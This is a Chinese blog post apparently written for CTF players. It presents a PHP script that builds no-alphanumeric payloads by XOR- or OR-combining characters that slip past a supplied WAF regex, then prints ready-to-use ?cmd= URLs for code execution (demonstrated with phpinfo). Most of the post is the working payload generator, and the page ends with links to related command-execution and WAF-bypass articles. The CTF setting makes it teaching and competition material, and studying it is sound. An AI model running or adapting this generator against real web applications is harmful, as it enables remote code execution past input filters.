[CTF脚本] PHP命令执行 字符构造脚本

已于 2024-10-29 20:38:16 修改
阅读量414 收藏 3
点赞数 2
文章标签: php 安全
于 2024-10-25 18:18:51 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/qq_42585535/article/details/143241128
版权

[CTF脚本] PHP命令执行 字符构造脚本

以后再也不用费尽心思去现场写了

命令执行这种题能秒就秒

使用说明

开始梭之前,只需手动设置以下3个参数:

1.要构造的字符串

$code_required = "phpinfo";

2.使用的运算符,目前可用^和|

$operator = "|";

3.题目给的waf(直接copy)

$waf = '/[a-z]|[0-9]|\+|\-|\.|\_|\||\$|\{|\}|\~|\%|\&|\;/i';

然后开始抢1血吧

脚本源码

<?php

/**
 * PHP字符运算构造脚本
 *
 * 功能描述:只需设置要构造的字符串$code_required以及所用运算符$operator,以及题目waf,便可一把suo
 *
 * @author     Lanb0 <2560454149@qq.com>
 * @since      2024/10/25
 */

//要构造的字符串
$code_required = "phpinfo";

//使用的运算符,可用^和|
$operator = "|";

// 可用字符集
$char_list = [];

// 黑名单字符集,大多数题目不会直接给字符集,所以改用waf
//$balck_list = [];

//把题目里的waf规则copy下来
$waf = '/[a-z]|[0-9]|\+|\-|\.|\_|\||\$|\{|\}|\~|\%|\&|\;/i';

//格式化结果集1
$result_1="";

//格式化结果集2
$result_2="";
$result_2_one="";
$result_2_two="";

$temp_char='';

function urlencode_completeply($char){
    $char = bin2hex($char);
    $char = "%".$char;
    return $char;
}

// 生成可用字符集
for ($i = 1; $i <= 126; $i++) {

    $temp_char = (chr($i));

    /*if(!in_array($temp_char,$balck_list)){
        $char_list[] = chr($i);
    }*/
    if(!preg_match($waf, $temp_char)&& !in_array($temp_char,['\'','"','\\'])){
        $char_list[] = chr($i);
    }

}


// 开始构造
$pass_flag;
foreach (str_split($code_required) as $code_char){

    $pass_flag = false;

    foreach ($char_list as $i){

        foreach ($char_list as $j){
            // 此处根据需要可更换为其他运算符
             $expression = "'".$i."'".$operator."'".$j."'";
            $char_xor = eval("return $expression;");
            if($char_xor === $code_char){
                //构造第一种格式化结果
                $result_1.=".('".urlencode_completeply(($i))."'".$operator."'".urlencode_completeply(($j))."')";

                //构造第二种格式化结果
                $result_2_one.=urlencode_completeply($i);
                $result_2_two.=urlencode_completeply($j);

                $pass_flag = true;
                break;
            }
        }
        if ($pass_flag) {
            break;
        }

    }
    if (!$pass_flag){
        echo $code_char."在当前可用字符集中没有找到可以构造的一对字符,请尽可能扩大可用字符集(ASCII范围: 1-255)\n";
        exit(0);
    }
    
}
$result_1 = "(".substr($result_1, 1).")"."();";

$result_2 = "("."('".$result_2_one."')" .$operator. "('".$result_2_two."')".")"."();";

//贴心的给出了构造格式,以防能构造但不知道怎么传参的尴尬
echo 'http://xxx.com/?cmd='.$result_1 . "\n";
echo 'http://xxx.com/?cmd='.$result_2 . "\n";
?>
小白Lanb0
关注
PHP简介:如何创建PHP脚本
新华编程特战队
03-26 1451
如果您使用的是本地服务器,请确保将 PHP 文件放在适当的目录中,通常是 XAMPP 的“htdocs”文件夹或 WAMP 的“www”文件夹。然后,通过浏览器访问您的脚本,方法是输入服务器的 URL,然后输入 PHP 文件的名称(例如,在 PHP 脚本中,您可以使用变量来存储和操作数据,利用 if-else 语句和条件逻辑循环等控制结构,以及为特定任务调用内置或用户定义的函数。) 表示语句的结尾。如果您使用的是在线开发环境,只需将 PHP 代码复制并粘贴到编辑器中,然后单击“运行”或“执行”按钮即可。
ctf.show之命令执行
weixin_68477635的博客
09-26 229
web29 : 命令执行,需要严格的过滤
如何写出安全又可靠的PHP脚本
咔咔博客
09-22 3947
一个完善的脚本应该具备那几个因素前言一、如何写一份安全又可靠的PHP脚本1-1 设置合理的内存 前言 项目中由于以前对权限这块没有设计好,导致现在新增加的权限需要手动执行脚本给所有用户添加对应的权限。 那么接下来咔咔将带你了解怎么写安全又可靠的PHP脚本和以后遇到此功能如何提前设计好,踩过一次坑就直接给它埋了。 一、如何写一份安全又可靠的PHP脚本 1-1 设置合理的内存 在PHP中使用memory_limit来设置单个进程的内存大小。 ...
PHP常见的命令执行函数与代码执行函数
dys的博客
06-23 6634
命令执行与代码执行
web实验——PHP脚本的编写
weixin_42001873的博客
05-07 358
一 标签提示“Please input your name”,并创建输入框(类似注册登录) 这个方法中有几个点: “!”:否运算符。当value转化为布尔值是false时,加上前面的!条件成立,if后面的括号内为true。value的可取值是null、undefined、0、“ ”,false。(!=是一个二元运算符,判断它左边和右边的值是否相等,如果对引用类型度则判断它们是否是相同的引用,若...
学习记录-WAF绕过
SmileAndFun的博客
09-21 423
学习记录-WAF绕过 注:文章仅用于学术交流,不用于其它用途 一、WAF基础知识 概念:Web应用防护系统,执行一系列针对HTTP/HTTPS的安全策略为Web应用提供保护 分类:WAF有硬件类型的也有软件类型的,我们一般渗透测试都会遇到软WAF,因为硬件WAF价格有点昂贵,正常企业不会购买,基本上是大型国企才会买,常见的软WAF:安全狗、云锁、悬镜、护卫神、云盾 检测机制:其实很简单,核心就是正则匹配,虽然说还有字符串强行匹配,还有什么语义解析,但是实际上还是正则居多,安全和客户体验都是需要平衡的,特别是
php 字符串异或 绕过,浅析CTF绕过字符数字构造shell
weixin_36349685的博客
03-19 1451
前言在CTF中,虽然有很多文章有这方面的资料,但是相对来说比较零散,这里主要把自己学习和打ctf遇到的一些绕过字符数字构造shell梳理一下。无字母数字webshell简单来说就是payload中不能出现字母,数字(有些题目还有其他一些过滤),通过异或取反等方法取得flag。本文涉及知识点实操练习-使用base64与deflate对webshell编码测试源码...
CTF web入门之命令执行 完整版
qq_41701460的博客
04-11 602
绕过思路:过滤了system,echo,这里可以使用passthru,但是这次还过滤了括号,所以passthru也没有办法用,这里使用文件包含,通过php://filter协议进行读取文件。可以使用使用空格绕过(%09) 也可也使用&拼接使用eval函数可以使用POST和GET其实一样的。**web36:**同web33 在前面的基础上,过滤了数字。.被过滤,则直接采用*,*表示多个字符,?**web33:**多了个双引号 和上面的题一样。**web30:**命令执行,需要严格的过滤。
命令执行ing特殊字符特殊字符进化
02-08
命令执行漏洞中,一些特殊字符如反引号(`)、分号(;)、管道符(|)等,常被用于连接多个命令,实现对系统或应用的控制。但当这些特殊字符被过滤或限制使用时,就需要寻找替代的执行方式和字符编码方法。 #### ...
PHP 编写的 25个游戏脚本
10-29
PHP 是一种易于使用、易于学习且可以广泛获取的编程语言。它非常适合开发在各种游戏中可以使用的简单脚本
php脚本语言编写的一些小游戏(简单)
08-19
php是一种脚本语言,可以用作网页的编程,现在php的市场性越来越好,特别是作为一种开源代码,可用性更强,简单易学
CTF-Misc通用脚本工具包:隐写分析 + 编码解码 + 文件伪装检测
最新发布
05-13
本资源包面向CTF选手和安全爱好者,精选5个常用的Misc类题目实战脚本,包括隐写提取、base编码识别、十六进制转字符、文件伪装检测等。附带使用说明与样例图像,便于训练与快速上手,适合学习与备赛使用。
怎么写一个php脚本_php脚本怎么写
weixin_33308579的博客
03-08 1284
php脚本的书写相对其他的语言,比如java,c#等语言来说是简单很多的,主要因为它是弱类型语言,相对来说比较随意,发挥空间较大。基本的语句结构都是那些一样的,顺序结构,选择结构和循环结构...书写php脚本只要有适宜的编辑器即可,新手来说用nodpad++,editplus等编辑器就好。 (推荐学习:PHP视频教程)如果想要运行php脚本的话就要搭配相应的运行环境才可,最常用的wamp或者la...
php脚本是什么,PHP脚本的编写
weixin_33174889的博客
03-10 2995
php脚本的书写相对其他的语言,比如java,c#等语言来说是简单很多的,主要因为它是弱类型语言,相对来说比较随意,发挥空间较大。基本的语句结构都是那些一样的,顺序结构,选择结构和循环结构…书写php脚本只要有适宜的编辑器即可,新手来说用nodpad++,editplus等编辑器就好。如果想要运行php脚本的话就要搭配相应的运行环境才可,最常用的wamp或者lamp。不会配置环境的可以去OA上面的...
php脚本#!/usr/bin/env php写法的好处
weixin_34038293的博客
09-02 199
最近在写PHP脚本发现有些脚本有这么个写法,长见识了。 脚本语言的第一行,目的就是指出,你想要你的这个文件中的代码用什么可执行程序去运行它。比如php脚本的第一行可以写成如下几种格式#!/usr/bin/php#!/usr/bin/env php#!/usr/bin/env -S -P/usr/local/bin:/usr/bin php#!/usr/bin/env -S-P/usr/local...
一个专门用来写脚本脚本PHP框架
Yk's Blog
02-18 3457
框架优点 配合swoole可以实现脚本配置自动挂载,包含swoole自身的毫秒定时器形式、crontab和nobup形式;使用swoole的毫秒定时器来实现毫秒级别和秒级别的脚本定制;框架本身也提供了一些简单的命令来查看以及执行编写的脚本;框架易于扩展; 源码地址:https://github.com/ybscript/yb-job 如有大佬看后觉得有需要改进的地方,希望不吝赐教!会及时进行完善改...
PHP写linux的shell脚本,以及crontab运行方法
咖啡如同生活的专栏
12-12 4262
首先php可以写linux的shell脚本,是非常快捷方便的,也展现了php的强大。 (1)讲解头部的一些开头文件代表什么意思。 eg #!/usr/bin/env php #!/usr/bin/php 哎,看了网上的一些说法,说只要平常写#!/usr/bin/env php就可以了,我也尝试了好多次,不成功,不得其原因,于是自己去琢磨了一下。 大概的意思是指的php的编译路径
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值